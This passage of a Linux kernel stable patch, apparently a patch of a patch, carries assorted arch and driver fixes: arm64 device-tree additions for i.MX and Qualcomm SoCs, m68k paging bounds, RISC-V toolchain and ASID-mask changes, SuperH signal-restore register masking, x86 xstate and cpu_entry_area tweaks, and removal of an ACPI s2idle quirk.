+ 		compatible = "wlf,wm8960";
+ 		reg = <0x1a>;
+ 		clocks = <&clk IMX8MM_CLK_SAI1_ROOT>;
+-		clock-names = "mclk1";
++		clock-names = "mclk";
+ 		wlf,shared-lrclk;
+ 		#sound-dai-cells = <0>;
+ 	};
+diff --git a/arch/arm64/boot/dts/freescale/imx8mn.dtsi b/arch/arm64/boot/dts/freescale/imx8mn.dtsi
+index 7601a031f85a0..b3120b49bd712 100644
+--- a/arch/arm64/boot/dts/freescale/imx8mn.dtsi
++++ b/arch/arm64/boot/dts/freescale/imx8mn.dtsi
+@@ -296,6 +296,7 @@
+ 				sai2: sai@30020000 {
+ 					compatible = "fsl,imx8mn-sai", "fsl,imx8mq-sai";
+ 					reg = <0x30020000 0x10000>;
++					#sound-dai-cells = <0>;
+ 					interrupts = <GIC_SPI 96 IRQ_TYPE_LEVEL_HIGH>;
+ 					clocks = <&clk IMX8MN_CLK_SAI2_IPG>,
+ 						<&clk IMX8MN_CLK_DUMMY>,
+@@ -310,6 +311,7 @@
+ 				sai3: sai@30030000 {
+ 					compatible = "fsl,imx8mn-sai", "fsl,imx8mq-sai";
+ 					reg = <0x30030000 0x10000>;
++					#sound-dai-cells = <0>;
+ 					interrupts = <GIC_SPI 50 IRQ_TYPE_LEVEL_HIGH>;
+ 					clocks = <&clk IMX8MN_CLK_SAI3_IPG>,
+ 						 <&clk IMX8MN_CLK_DUMMY>,
+@@ -324,6 +326,7 @@
+ 				sai5: sai@30050000 {
+ 					compatible = "fsl,imx8mn-sai", "fsl,imx8mq-sai";
+ 					reg = <0x30050000 0x10000>;
++					#sound-dai-cells = <0>;
+ 					interrupts = <GIC_SPI 90 IRQ_TYPE_LEVEL_HIGH>;
+ 					clocks = <&clk IMX8MN_CLK_SAI5_IPG>,
+ 						 <&clk IMX8MN_CLK_DUMMY>,
+@@ -340,6 +343,7 @@
+ 				sai6: sai@30060000 {
+ 					compatible = "fsl,imx8mn-sai", "fsl,imx8mq-sai";
+ 					reg = <0x30060000  0x10000>;
++					#sound-dai-cells = <0>;
+ 					interrupts = <GIC_SPI 90 IRQ_TYPE_LEVEL_HIGH>;
+ 					clocks = <&clk IMX8MN_CLK_SAI6_IPG>,
+ 						 <&clk IMX8MN_CLK_DUMMY>,
+@@ -397,6 +401,7 @@
+ 				sai7: sai@300b0000 {
+ 					compatible = "fsl,imx8mn-sai", "fsl,imx8mq-sai";
+ 					reg = <0x300b0000 0x10000>;
++					#sound-dai-cells = <0>;
+ 					interrupts = <GIC_SPI 111 IRQ_TYPE_LEVEL_HIGH>;
+ 					clocks = <&clk IMX8MN_CLK_SAI7_IPG>,
+ 						 <&clk IMX8MN_CLK_DUMMY>,
+diff --git a/arch/arm64/boot/dts/freescale/imx93.dtsi b/arch/arm64/boot/dts/freescale/imx93.dtsi
+index 5d79663b3b84c..d1b34d9db9daf 100644
+--- a/arch/arm64/boot/dts/freescale/imx93.dtsi
++++ b/arch/arm64/boot/dts/freescale/imx93.dtsi
+@@ -164,6 +164,8 @@
+ 			lpi2c1: i2c@44340000 {
+ 				compatible = "fsl,imx93-lpi2c", "fsl,imx7ulp-lpi2c";
+ 				reg = <0x44340000 0x10000>;
++				#address-cells = <1>;
++				#size-cells = <0>;
+ 				interrupts = <GIC_SPI 13 IRQ_TYPE_LEVEL_HIGH>;
+ 				clocks = <&clk IMX93_CLK_LPI2C1_GATE>,
+ 					 <&clk IMX93_CLK_BUS_AON>;
+@@ -174,6 +176,8 @@
+ 			lpi2c2: i2c@44350000 {
+ 				compatible = "fsl,imx93-lpi2c", "fsl,imx7ulp-lpi2c";
+ 				reg = <0x44350000 0x10000>;
++				#address-cells = <1>;
++				#size-cells = <0>;
+ 				interrupts = <GIC_SPI 14 IRQ_TYPE_LEVEL_HIGH>;
+ 				clocks = <&clk IMX93_CLK_LPI2C2_GATE>,
+ 					 <&clk IMX93_CLK_BUS_AON>;
+@@ -316,6 +320,8 @@
+ 			lpi2c3: i2c@42530000 {
+ 				compatible = "fsl,imx93-lpi2c", "fsl,imx7ulp-lpi2c";
+ 				reg = <0x42530000 0x10000>;
++				#address-cells = <1>;
++				#size-cells = <0>;
+ 				interrupts = <GIC_SPI 62 IRQ_TYPE_LEVEL_HIGH>;
+ 				clocks = <&clk IMX93_CLK_LPI2C3_GATE>,
+ 					 <&clk IMX93_CLK_BUS_WAKEUP>;
+@@ -326,6 +332,8 @@
+ 			lpi2c4: i2c@42540000 {
+ 				compatible = "fsl,imx93-lpi2c", "fsl,imx7ulp-lpi2c";
+ 				reg = <0x42540000 0x10000>;
++				#address-cells = <1>;
++				#size-cells = <0>;
+ 				interrupts = <GIC_SPI 63 IRQ_TYPE_LEVEL_HIGH>;
+ 				clocks = <&clk IMX93_CLK_LPI2C4_GATE>,
+ 					 <&clk IMX93_CLK_BUS_WAKEUP>;
+@@ -414,6 +422,8 @@
+ 			lpi2c5: i2c@426b0000 {
+ 				compatible = "fsl,imx93-lpi2c", "fsl,imx7ulp-lpi2c";
+ 				reg = <0x426b0000 0x10000>;
++				#address-cells = <1>;
++				#size-cells = <0>;
+ 				interrupts = <GIC_SPI 195 IRQ_TYPE_LEVEL_HIGH>;
+ 				clocks = <&clk IMX93_CLK_LPI2C5_GATE>,
+ 					 <&clk IMX93_CLK_BUS_WAKEUP>;
+@@ -424,6 +434,8 @@
+ 			lpi2c6: i2c@426c0000 {
+ 				compatible = "fsl,imx93-lpi2c", "fsl,imx7ulp-lpi2c";
+ 				reg = <0x426c0000 0x10000>;
++				#address-cells = <1>;
++				#size-cells = <0>;
+ 				interrupts = <GIC_SPI 196 IRQ_TYPE_LEVEL_HIGH>;
+ 				clocks = <&clk IMX93_CLK_LPI2C6_GATE>,
+ 					 <&clk IMX93_CLK_BUS_WAKEUP>;
+@@ -434,6 +446,8 @@
+ 			lpi2c7: i2c@426d0000 {
+ 				compatible = "fsl,imx93-lpi2c", "fsl,imx7ulp-lpi2c";
+ 				reg = <0x426d0000 0x10000>;
++				#address-cells = <1>;
++				#size-cells = <0>;
+ 				interrupts = <GIC_SPI 197 IRQ_TYPE_LEVEL_HIGH>;
+ 				clocks = <&clk IMX93_CLK_LPI2C7_GATE>,
+ 					 <&clk IMX93_CLK_BUS_WAKEUP>;
+@@ -444,6 +458,8 @@
+ 			lpi2c8: i2c@426e0000 {
+ 				compatible = "fsl,imx93-lpi2c", "fsl,imx7ulp-lpi2c";
+ 				reg = <0x426e0000 0x10000>;
++				#address-cells = <1>;
++				#size-cells = <0>;
+ 				interrupts = <GIC_SPI 198 IRQ_TYPE_LEVEL_HIGH>;
+ 				clocks = <&clk IMX93_CLK_LPI2C8_GATE>,
+ 					 <&clk IMX93_CLK_BUS_WAKEUP>;
+diff --git a/arch/arm64/boot/dts/qcom/sc7280.dtsi b/arch/arm64/boot/dts/qcom/sc7280.dtsi
+index 3bedd45e14afd..a407cd2579719 100644
+--- a/arch/arm64/boot/dts/qcom/sc7280.dtsi
++++ b/arch/arm64/boot/dts/qcom/sc7280.dtsi
+@@ -2122,6 +2122,8 @@
+ 			pinctrl-names = "default";
+ 			pinctrl-0 = <&pcie1_clkreq_n>;
+ 
++			dma-coherent;
++
+ 			iommus = <&apps_smmu 0x1c80 0x1>;
+ 
+ 			iommu-map = <0x0 &apps_smmu 0x1c80 0x1>,
+diff --git a/arch/arm64/boot/dts/qcom/sc8280xp-lenovo-thinkpad-x13s.dts b/arch/arm64/boot/dts/qcom/sc8280xp-lenovo-thinkpad-x13s.dts
+index 568c6be1ceaae..d21bb7f3ec259 100644
+--- a/arch/arm64/boot/dts/qcom/sc8280xp-lenovo-thinkpad-x13s.dts
++++ b/arch/arm64/boot/dts/qcom/sc8280xp-lenovo-thinkpad-x13s.dts
+@@ -186,6 +186,7 @@
+ 			regulator-min-microvolt = <1272000>;
+ 			regulator-max-microvolt = <1272000>;
+ 			regulator-initial-mode = <RPMH_REGULATOR_MODE_HPM>;
++			regulator-always-on;
+ 		};
+ 
+ 		vreg_l3b: ldo3 {
+@@ -425,75 +426,88 @@
+ 	pmic-die-temp@3 {
+ 		reg = <PMK8350_ADC7_DIE_TEMP>;
+ 		qcom,pre-scaling = <1 1>;
++		label = "pmk8350_die_temp";
+ 	};
+ 
+ 	xo-therm@44 {
+ 		reg = <PMK8350_ADC7_AMUX_THM1_100K_PU>;
+ 		qcom,hw-settle-time = <200>;
+ 		qcom,ratiometric;
++		label = "pmk8350_xo_therm";
+ 	};
+ 
+ 	pmic-die-temp@103 {
+ 		reg = <PM8350_ADC7_DIE_TEMP(1)>;
+ 		qcom,pre-scaling = <1 1>;
++		label = "pmc8280_1_die_temp";
+ 	};
+ 
+ 	sys-therm@144 {
+ 		reg = <PM8350_ADC7_AMUX_THM1_100K_PU(1)>;
+ 		qcom,hw-settle-time = <200>;
+ 		qcom,ratiometric;
++		label = "sys_therm1";
+ 	};
+ 
+ 	sys-therm@145 {
+ 		reg = <PM8350_ADC7_AMUX_THM2_100K_PU(1)>;
+ 		qcom,hw-settle-time = <200>;
+ 		qcom,ratiometric;
++		label = "sys_therm2";
+ 	};
+ 
+ 	sys-therm@146 {
+ 		reg = <PM8350_ADC7_AMUX_THM3_100K_PU(1)>;
+ 		qcom,hw-settle-time = <200>;
+ 		qcom,ratiometric;
++		label = "sys_therm3";
+ 	};
+ 
+ 	sys-therm@147 {
+ 		reg = <PM8350_ADC7_AMUX_THM4_100K_PU(1)>;
+ 		qcom,hw-settle-time = <200>;
+ 		qcom,ratiometric;
++		label = "sys_therm4";
+ 	};
+ 
+ 	pmic-die-temp@303 {
+ 		reg = <PM8350_ADC7_DIE_TEMP(3)>;
+ 		qcom,pre-scaling = <1 1>;
++		label = "pmc8280_2_die_temp";
+ 	};
+ 
+ 	sys-therm@344 {
+ 		reg = <PM8350_ADC7_AMUX_THM1_100K_PU(3)>;
+ 		qcom,hw-settle-time = <200>;
+ 		qcom,ratiometric;
++		label = "sys_therm5";
+ 	};
+ 
+ 	sys-therm@345 {
+ 		reg = <PM8350_ADC7_AMUX_THM2_100K_PU(3)>;
+ 		qcom,hw-settle-time = <200>;
+ 		qcom,ratiometric;
++		label = "sys_therm6";
+ 	};
+ 
+ 	sys-therm@346 {
+ 		reg = <PM8350_ADC7_AMUX_THM3_100K_PU(3)>;
+ 		qcom,hw-settle-time = <200>;
+ 		qcom,ratiometric;
++		label = "sys_therm7";
+ 	};
+ 
+ 	sys-therm@347 {
+ 		reg = <PM8350_ADC7_AMUX_THM4_100K_PU(3)>;
+ 		qcom,hw-settle-time = <200>;
+ 		qcom,ratiometric;
++		label = "sys_therm8";
+ 	};
+ 
+ 	pmic-die-temp@403 {
+ 		reg = <PMR735A_ADC7_DIE_TEMP>;
+ 		qcom,pre-scaling = <1 1>;
++		label = "pmr735a_die_temp";
+ 	};
+ };
+ 
+diff --git a/arch/arm64/boot/dts/qcom/sm6375.dtsi b/arch/arm64/boot/dts/qcom/sm6375.dtsi
+index 12cf5dbe5bd64..419df4e3ac91d 100644
+--- a/arch/arm64/boot/dts/qcom/sm6375.dtsi
++++ b/arch/arm64/boot/dts/qcom/sm6375.dtsi
+@@ -1209,6 +1209,7 @@
+ 			clock-names = "xo";
+ 
+ 			power-domains = <&rpmpd SM6375_VDDCX>;
++			power-domain-names = "cx";
+ 
+ 			memory-region = <&pil_cdsp_mem>;
+ 
+diff --git a/arch/arm64/boot/dts/qcom/sm8150.dtsi b/arch/arm64/boot/dts/qcom/sm8150.dtsi
+index a0c57fb798d3b..f790223ed8f5a 100644
+--- a/arch/arm64/boot/dts/qcom/sm8150.dtsi
++++ b/arch/arm64/boot/dts/qcom/sm8150.dtsi
+@@ -1810,7 +1810,7 @@
+ 				      "slave_q2a",
+ 				      "tbu";
+ 
+-			iommus = <&apps_smmu 0x1d80 0x7f>;
++			iommus = <&apps_smmu 0x1d80 0x3f>;
+ 			iommu-map = <0x0   &apps_smmu 0x1d80 0x1>,
+ 				    <0x100 &apps_smmu 0x1d81 0x1>;
+ 
+@@ -1909,7 +1909,7 @@
+ 			assigned-clocks = <&gcc GCC_PCIE_1_AUX_CLK>;
+ 			assigned-clock-rates = <19200000>;
+ 
+-			iommus = <&apps_smmu 0x1e00 0x7f>;
++			iommus = <&apps_smmu 0x1e00 0x3f>;
+ 			iommu-map = <0x0   &apps_smmu 0x1e00 0x1>,
+ 				    <0x100 &apps_smmu 0x1e01 0x1>;
+ 
+diff --git a/arch/arm64/boot/dts/qcom/sm8450.dtsi b/arch/arm64/boot/dts/qcom/sm8450.dtsi
+index f57980a32b433..16a73288c1b37 100644
+--- a/arch/arm64/boot/dts/qcom/sm8450.dtsi
++++ b/arch/arm64/boot/dts/qcom/sm8450.dtsi
+@@ -2104,8 +2104,8 @@
+ 				 <&q6prmcc LPASS_HW_DCODEC_VOTE LPASS_CLK_ATTRIBUTE_COUPLE_NO>,
+ 				 <&vamacro>;
+ 			clock-names = "mclk", "npl", "macro", "dcodec", "fsgen";
+-			assigned-clocks = <&q6prmcc LPASS_CLK_ID_WSA_CORE_TX_MCLK LPASS_CLK_ATTRIBUTE_COUPLE_NO>,
+-					  <&q6prmcc LPASS_CLK_ID_WSA_CORE_TX_2X_MCLK LPASS_CLK_ATTRIBUTE_COUPLE_NO>;
++			assigned-clocks = <&q6prmcc LPASS_CLK_ID_WSA2_CORE_TX_MCLK LPASS_CLK_ATTRIBUTE_COUPLE_NO>,
++					  <&q6prmcc LPASS_CLK_ID_WSA2_CORE_TX_2X_MCLK LPASS_CLK_ATTRIBUTE_COUPLE_NO>;
+ 			assigned-clock-rates = <19200000>, <19200000>;
+ 
+ 			#clock-cells = <0>;
+@@ -3658,6 +3658,7 @@
+ 			power-domains = <&gcc UFS_PHY_GDSC>;
+ 
+ 			iommus = <&apps_smmu 0xe0 0x0>;
++			dma-coherent;
+ 
+ 			interconnects = <&aggre1_noc MASTER_UFS_MEM 0 &mc_virt SLAVE_EBI1 0>,
+ 					<&gem_noc MASTER_APPSS_PROC 0 &config_noc SLAVE_UFS_MEM_CFG 0>;
+diff --git a/arch/arm64/kernel/efi-header.S b/arch/arm64/kernel/efi-header.S
+index 28d8a5dca5f12..d731b4655df8e 100644
+--- a/arch/arm64/kernel/efi-header.S
++++ b/arch/arm64/kernel/efi-header.S
+@@ -66,7 +66,7 @@
+ 	.long	.Lefi_header_end - .L_head		// SizeOfHeaders
+ 	.long	0					// CheckSum
+ 	.short	IMAGE_SUBSYSTEM_EFI_APPLICATION		// Subsystem
+-	.short	0					// DllCharacteristics
++	.short	IMAGE_DLL_CHARACTERISTICS_NX_COMPAT	// DllCharacteristics
+ 	.quad	0					// SizeOfStackReserve
+ 	.quad	0					// SizeOfStackCommit
+ 	.quad	0					// SizeOfHeapReserve
+diff --git a/arch/m68k/kernel/traps.c b/arch/m68k/kernel/traps.c
+index 5c8cba0efc63e..a700807c9b6d9 100644
+--- a/arch/m68k/kernel/traps.c
++++ b/arch/m68k/kernel/traps.c
+@@ -30,6 +30,7 @@
+ #include <linux/init.h>
+ #include <linux/ptrace.h>
+ #include <linux/kallsyms.h>
++#include <linux/extable.h>
+ 
+ #include <asm/setup.h>
+ #include <asm/fpu.h>
+@@ -545,7 +546,8 @@ static inline void bus_error030 (struct frame *fp)
+ 			errorcode |= 2;
+ 
+ 		if (mmusr & (MMU_I | MMU_WP)) {
+-			if (ssw & 4) {
++			/* We might have an exception table for this PC */
++			if (ssw & 4 && !search_exception_tables(fp->ptregs.pc)) {
+ 				pr_err("Data %s fault at %#010lx in %s (pc=%#lx)\n",
+ 				       ssw & RW ? "read" : "write",
+ 				       fp->un.fmtb.daddr,
+diff --git a/arch/m68k/mm/motorola.c b/arch/m68k/mm/motorola.c
+index 2a375637e0077..9113012240789 100644
+--- a/arch/m68k/mm/motorola.c
++++ b/arch/m68k/mm/motorola.c
+@@ -437,7 +437,7 @@ void __init paging_init(void)
+ 	}
+ 
+ 	min_addr = m68k_memory[0].addr;
+-	max_addr = min_addr + m68k_memory[0].size;
++	max_addr = min_addr + m68k_memory[0].size - 1;
+ 	memblock_add_node(m68k_memory[0].addr, m68k_memory[0].size, 0,
+ 			  MEMBLOCK_NONE);
+ 	for (i = 1; i < m68k_num_memory;) {
+@@ -452,21 +452,21 @@ void __init paging_init(void)
+ 		}
+ 		memblock_add_node(m68k_memory[i].addr, m68k_memory[i].size, i,
+ 				  MEMBLOCK_NONE);
+-		addr = m68k_memory[i].addr + m68k_memory[i].size;
++		addr = m68k_memory[i].addr + m68k_memory[i].size - 1;
+ 		if (addr > max_addr)
+ 			max_addr = addr;
+ 		i++;
+ 	}
+ 	m68k_memoffset = min_addr - PAGE_OFFSET;
+-	m68k_virt_to_node_shift = fls(max_addr - min_addr - 1) - 6;
++	m68k_virt_to_node_shift = fls(max_addr - min_addr) - 6;
+ 
+ 	module_fixup(NULL, __start_fixup, __stop_fixup);
+ 	flush_icache();
+ 
+-	high_memory = phys_to_virt(max_addr);
++	high_memory = phys_to_virt(max_addr) + 1;
+ 
+ 	min_low_pfn = availmem >> PAGE_SHIFT;
+-	max_pfn = max_low_pfn = max_addr >> PAGE_SHIFT;
++	max_pfn = max_low_pfn = (max_addr >> PAGE_SHIFT) + 1;
+ 
+ 	/* Reserve kernel text/data/bss and the memory allocated in head.S */
+ 	memblock_reserve(m68k_memory[0].addr, availmem - m68k_memory[0].addr);
+diff --git a/arch/powerpc/xmon/xmon.c b/arch/powerpc/xmon/xmon.c
+index 0da66bc4823d4..3b4e2475fc4ef 100644
+--- a/arch/powerpc/xmon/xmon.c
++++ b/arch/powerpc/xmon/xmon.c
+@@ -1277,7 +1277,7 @@ static int xmon_batch_next_cpu(void)
+ 	while (!cpumask_empty(&xmon_batch_cpus)) {
+ 		cpu = cpumask_next_wrap(smp_processor_id(), &xmon_batch_cpus,
+ 					xmon_batch_start_cpu, true);
+-		if (cpu == nr_cpumask_bits)
++		if (cpu >= nr_cpu_ids)
+ 			break;
+ 		if (xmon_batch_start_cpu == -1)
+ 			xmon_batch_start_cpu = cpu;
+diff --git a/arch/riscv/Kconfig b/arch/riscv/Kconfig
+index ee0d39b267946..08a0f0c2c4857 100644
+--- a/arch/riscv/Kconfig
++++ b/arch/riscv/Kconfig
+@@ -447,6 +447,28 @@ config TOOLCHAIN_HAS_ZIHINTPAUSE
+ 	depends on !32BIT || $(cc-option,-mabi=ilp32 -march=rv32ima_zihintpause)
+ 	depends on LLD_VERSION >= 150000 || LD_VERSION >= 23600
+ 
++config TOOLCHAIN_NEEDS_EXPLICIT_ZICSR_ZIFENCEI
++	def_bool y
++	# https://sourceware.org/git/?p=binutils-gdb.git;a=commit;h=aed44286efa8ae8717a77d94b51ac3614e2ca6dc
++	depends on AS_IS_GNU && AS_VERSION >= 23800
++	help
++	  Newer binutils versions default to ISA spec version 20191213 which
++	  moves some instructions from the I extension to the Zicsr and Zifencei
++	  extensions.
++
++config TOOLCHAIN_NEEDS_OLD_ISA_SPEC
++	def_bool y
++	depends on TOOLCHAIN_NEEDS_EXPLICIT_ZICSR_ZIFENCEI
++	# https://github.com/llvm/llvm-project/commit/22e199e6afb1263c943c0c0d4498694e15bf8a16
++	depends on CC_IS_CLANG && CLANG_VERSION < 170000
++	help
++	  Certain versions of clang do not support zicsr and zifencei via -march
++	  but newer versions of binutils require it for the reasons noted in the
++	  help text of CONFIG_TOOLCHAIN_NEEDS_EXPLICIT_ZICSR_ZIFENCEI. This
++	  option causes an older ISA spec compatible with these older versions
++	  of clang to be passed to GAS, which has the same result as passing zicsr
++	  and zifencei to -march.
++
+ config FPU
+ 	bool "FPU support"
+ 	default y
+diff --git a/arch/riscv/Makefile b/arch/riscv/Makefile
+index 5931a0ff3c814..0d196e0120f2c 100644
+--- a/arch/riscv/Makefile
++++ b/arch/riscv/Makefile
+@@ -57,10 +57,12 @@ riscv-march-$(CONFIG_ARCH_RV64I)	:= rv64ima
+ riscv-march-$(CONFIG_FPU)		:= $(riscv-march-y)fd
+ riscv-march-$(CONFIG_RISCV_ISA_C)	:= $(riscv-march-y)c
+ 
+-# Newer binutils versions default to ISA spec version 20191213 which moves some
+-# instructions from the I extension to the Zicsr and Zifencei extensions.
+-toolchain-need-zicsr-zifencei := $(call cc-option-yn, -march=$(riscv-march-y)_zicsr_zifencei)
+-riscv-march-$(toolchain-need-zicsr-zifencei) := $(riscv-march-y)_zicsr_zifencei
++ifdef CONFIG_TOOLCHAIN_NEEDS_OLD_ISA_SPEC
++KBUILD_CFLAGS += -Wa,-misa-spec=2.2
++KBUILD_AFLAGS += -Wa,-misa-spec=2.2
++else
++riscv-march-$(CONFIG_TOOLCHAIN_NEEDS_EXPLICIT_ZICSR_ZIFENCEI) := $(riscv-march-y)_zicsr_zifencei
++endif
+ 
+ # Check if the toolchain supports Zicbom extension
+ riscv-march-$(CONFIG_TOOLCHAIN_HAS_ZICBOM) := $(riscv-march-y)_zicbom
+diff --git a/arch/riscv/include/asm/tlbflush.h b/arch/riscv/include/asm/tlbflush.h
+index 801019381dea3..a09196f8de688 100644
+--- a/arch/riscv/include/asm/tlbflush.h
++++ b/arch/riscv/include/asm/tlbflush.h
+@@ -12,6 +12,8 @@
+ #include <asm/errata_list.h>
+ 
+ #ifdef CONFIG_MMU
++extern unsigned long asid_mask;
++
+ static inline void local_flush_tlb_all(void)
+ {
+ 	__asm__ __volatile__ ("sfence.vma" : : : "memory");
+diff --git a/arch/riscv/include/uapi/asm/setup.h b/arch/riscv/include/uapi/asm/setup.h
+new file mode 100644
+index 0000000000000..66b13a5228808
+--- /dev/null
++++ b/arch/riscv/include/uapi/asm/setup.h
+@@ -0,0 +1,8 @@
++/* SPDX-License-Identifier: GPL-2.0-only WITH Linux-syscall-note */
++
++#ifndef _UAPI_ASM_RISCV_SETUP_H
++#define _UAPI_ASM_RISCV_SETUP_H
++
++#define COMMAND_LINE_SIZE	1024
++
++#endif /* _UAPI_ASM_RISCV_SETUP_H */
+diff --git a/arch/riscv/mm/context.c b/arch/riscv/mm/context.c
+index 0f784e3d307bb..12e22e7330e7b 100644
+--- a/arch/riscv/mm/context.c
++++ b/arch/riscv/mm/context.c
+@@ -22,7 +22,7 @@ DEFINE_STATIC_KEY_FALSE(use_asid_allocator);
+ 
+ static unsigned long asid_bits;
+ static unsigned long num_asids;
+-static unsigned long asid_mask;
++unsigned long asid_mask;
+ 
+ static atomic_long_t current_version;
+ 
+diff --git a/arch/riscv/mm/tlbflush.c b/arch/riscv/mm/tlbflush.c
+index 37ed760d007c3..ef701fa83f368 100644
+--- a/arch/riscv/mm/tlbflush.c
++++ b/arch/riscv/mm/tlbflush.c
+@@ -42,7 +42,7 @@ static void __sbi_tlb_flush_range(struct mm_struct *mm, unsigned long start,
+ 	/* check if the tlbflush needs to be sent to other CPUs */
+ 	broadcast = cpumask_any_but(cmask, cpuid) < nr_cpu_ids;
+ 	if (static_branch_unlikely(&use_asid_allocator)) {
+-		unsigned long asid = atomic_long_read(&mm->context.id);
++		unsigned long asid = atomic_long_read(&mm->context.id) & asid_mask;
+ 
+ 		if (broadcast) {
+ 			sbi_remote_sfence_vma_asid(cmask, start, size, asid);
+diff --git a/arch/sh/include/asm/processor_32.h b/arch/sh/include/asm/processor_32.h
+index 27aebf1e75a20..3ef7adf739c83 100644
+--- a/arch/sh/include/asm/processor_32.h
++++ b/arch/sh/include/asm/processor_32.h
+@@ -50,6 +50,7 @@
+ #define SR_FD		0x00008000
+ #define SR_MD		0x40000000
+ 
++#define SR_USER_MASK	0x00000303	// M, Q, S, T bits
+ /*
+  * DSP structure and data
+  */
+diff --git a/arch/sh/kernel/signal_32.c b/arch/sh/kernel/signal_32.c
+index 90f495d35db29..a6bfc6f374911 100644
+--- a/arch/sh/kernel/signal_32.c
++++ b/arch/sh/kernel/signal_32.c
+@@ -115,6 +115,7 @@ static int
+ restore_sigcontext(struct pt_regs *regs, struct sigcontext __user *sc, int *r0_p)
+ {
+ 	unsigned int err = 0;
++	unsigned int sr = regs->sr & ~SR_USER_MASK;
+ 
+ #define COPY(x)		err |= __get_user(regs->x, &sc->sc_##x)
+ 			COPY(regs[1]);
+@@ -130,6 +131,8 @@ restore_sigcontext(struct pt_regs *regs, struct sigcontext __user *sc, int *r0_p
+ 	COPY(sr);	COPY(pc);
+ #undef COPY
+ 
++	regs->sr = (regs->sr & SR_USER_MASK) | sr;
++
+ #ifdef CONFIG_SH_FPU
+ 	if (boot_cpu_data.flags & CPU_HAS_FPU) {
+ 		int owned_fp;
+diff --git a/arch/x86/events/amd/core.c b/arch/x86/events/amd/core.c
+index 4386b10682ce4..8ca5e827f30b2 100644
+--- a/arch/x86/events/amd/core.c
++++ b/arch/x86/events/amd/core.c
+@@ -923,6 +923,7 @@ static int amd_pmu_v2_handle_irq(struct pt_regs *regs)
+ 
+ 		/* Event overflow */
+ 		handled++;
++		status &= ~mask;
+ 		perf_sample_data_init(&data, 0, hwc->last_period);
+ 
+ 		if (!x86_perf_event_set_period(event))
+@@ -935,8 +936,6 @@ static int amd_pmu_v2_handle_irq(struct pt_regs *regs)
+ 
+ 		if (perf_event_overflow(event, &data, regs))
+ 			x86_pmu_stop(event, 0);
+-
+-		status &= ~mask;
+ 	}
+ 
+ 	/*
+diff --git a/arch/x86/kernel/fpu/xstate.c b/arch/x86/kernel/fpu/xstate.c
+index 714166cc25f2f..0bab497c94369 100644
+--- a/arch/x86/kernel/fpu/xstate.c
++++ b/arch/x86/kernel/fpu/xstate.c
+@@ -1118,21 +1118,20 @@ void __copy_xstate_to_uabi_buf(struct membuf to, struct fpstate *fpstate,
+ 	zerofrom = offsetof(struct xregs_state, extended_state_area);
+ 
+ 	/*
+-	 * The ptrace buffer is in non-compacted XSAVE format.  In
+-	 * non-compacted format disabled features still occupy state space,
+-	 * but there is no state to copy from in the compacted
+-	 * init_fpstate. The gap tracking will zero these states.
+-	 */
+-	mask = fpstate->user_xfeatures;
+-
+-	/*
+-	 * Dynamic features are not present in init_fpstate. When they are
+-	 * in an all zeros init state, remove those from 'mask' to zero
+-	 * those features in the user buffer instead of retrieving them
+-	 * from init_fpstate.
++	 * This 'mask' indicates which states to copy from fpstate.
++	 * Those extended states that are not present in fpstate are
++	 * either disabled or initialized:
++	 *
++	 * In non-compacted format, disabled features still occupy
++	 * state space but there is no state to copy from in the
++	 * compacted init_fpstate. The gap tracking will zero these
++	 * states.
++	 *
++	 * The extended features have an all zeroes init state. Thus,
++	 * remove them from 'mask' to zero those features in the user
++	 * buffer instead of retrieving them from init_fpstate.
+ 	 */
+-	if (fpu_state_size_dynamic())
+-		mask &= (header.xfeatures | xinit->header.xcomp_bv);
++	mask = header.xfeatures;
+ 
+ 	for_each_extended_xfeature(i, mask) {
+ 		/*
+@@ -1151,9 +1150,8 @@ void __copy_xstate_to_uabi_buf(struct membuf to, struct fpstate *fpstate,
+ 			pkru.pkru = pkru_val;
+ 			membuf_write(&to, &pkru, sizeof(pkru));
+ 		} else {
+-			copy_feature(header.xfeatures & BIT_ULL(i), &to,
++			membuf_write(&to,
+ 				     __raw_xsave_addr(xsave, i),
+-				     __raw_xsave_addr(xinit, i),
+ 				     xstate_sizes[i]);
+ 		}
+ 		/*
+diff --git a/arch/x86/mm/cpu_entry_area.c b/arch/x86/mm/cpu_entry_area.c
+index 7316a82242599..e91500a809639 100644
+--- a/arch/x86/mm/cpu_entry_area.c
++++ b/arch/x86/mm/cpu_entry_area.c
+@@ -10,6 +10,7 @@
+ #include <asm/fixmap.h>
+ #include <asm/desc.h>
+ #include <asm/kasan.h>
++#include <asm/setup.h>
+ 
+ static DEFINE_PER_CPU_PAGE_ALIGNED(struct entry_stack_page, entry_stack_storage);
+ 
+@@ -29,6 +30,12 @@ static __init void init_cea_offsets(void)
+ 	unsigned int max_cea;
+ 	unsigned int i, j;
+ 
++	if (!kaslr_enabled()) {
++		for_each_possible_cpu(i)
++			per_cpu(_cea_offset, i) = i;
++		return;
++	}
++
+ 	max_cea = (CPU_ENTRY_AREA_MAP_SIZE - PAGE_SIZE) / CPU_ENTRY_AREA_SIZE;
+ 
+ 	/* O(sodding terrible) */
+diff --git a/drivers/acpi/x86/s2idle.c b/drivers/acpi/x86/s2idle.c
+index c7afce465a071..e499c60c45791 100644
+--- a/drivers/acpi/x86/s2idle.c
++++ b/drivers/acpi/x86/s2idle.c
+@@ -384,29 +384,6 @@ static const struct acpi_device_id amd_hid_ids[] = {
+ 	{}
+ };
+ 
+-static int lps0_prefer_amd(const struct dmi_system_id *id)
+-{
+-	pr_debug("Using AMD GUID w/ _REV 2.\n");
+-	rev_id = 2;
+-	return 0;
+-}
+-static const struct dmi_system_id s2idle_dmi_table[] __initconst = {
+-	{
+-		/*
+-		 * AMD Rembrandt based HP EliteBook 835/845/865 G9
+-		 * Contains specialized AML in AMD/_REV 2 path to avoid
+-		 * triggering a bug in Qualcomm WLAN firmware. This may be
+-		 * removed in the future if that firmware is fixed.
+-		 */
+-		.callback = lps0_prefer_amd,
+-		.matches = {
+-			DMI_MATCH(DMI_BOARD_VENDOR, "HP"),
+-			DMI_MATCH(DMI_BOARD_NAME, "8990"),
+-		},
+-	},
+-	{}
+-};
+-
+ static int lps0_device_attach(struct acpi_device *adev,
+ 			      const struct acpi_device_id *not_used)
+ {
+@@ -586,7 +563,6 @@ static const struct platform_s2idle_ops acpi_s2idle_ops_lps0 = {
+ 
+ void __init acpi_s2idle_setup(void)
+ {
+-	dmi_check_system(s2idle_dmi_table);
+ 	acpi_scan_add_handler(&lps0_handler);
+ 	s2idle_set_ops(&acpi_s2idle_ops_lps0);
+ }
+diff --git a/drivers/acpi/x86/utils.c b/drivers/acpi/x86/utils.c
+index 4e816bb402f68..e45285d4e62a4 100644
+--- a/drivers/acpi/x86/utils.c
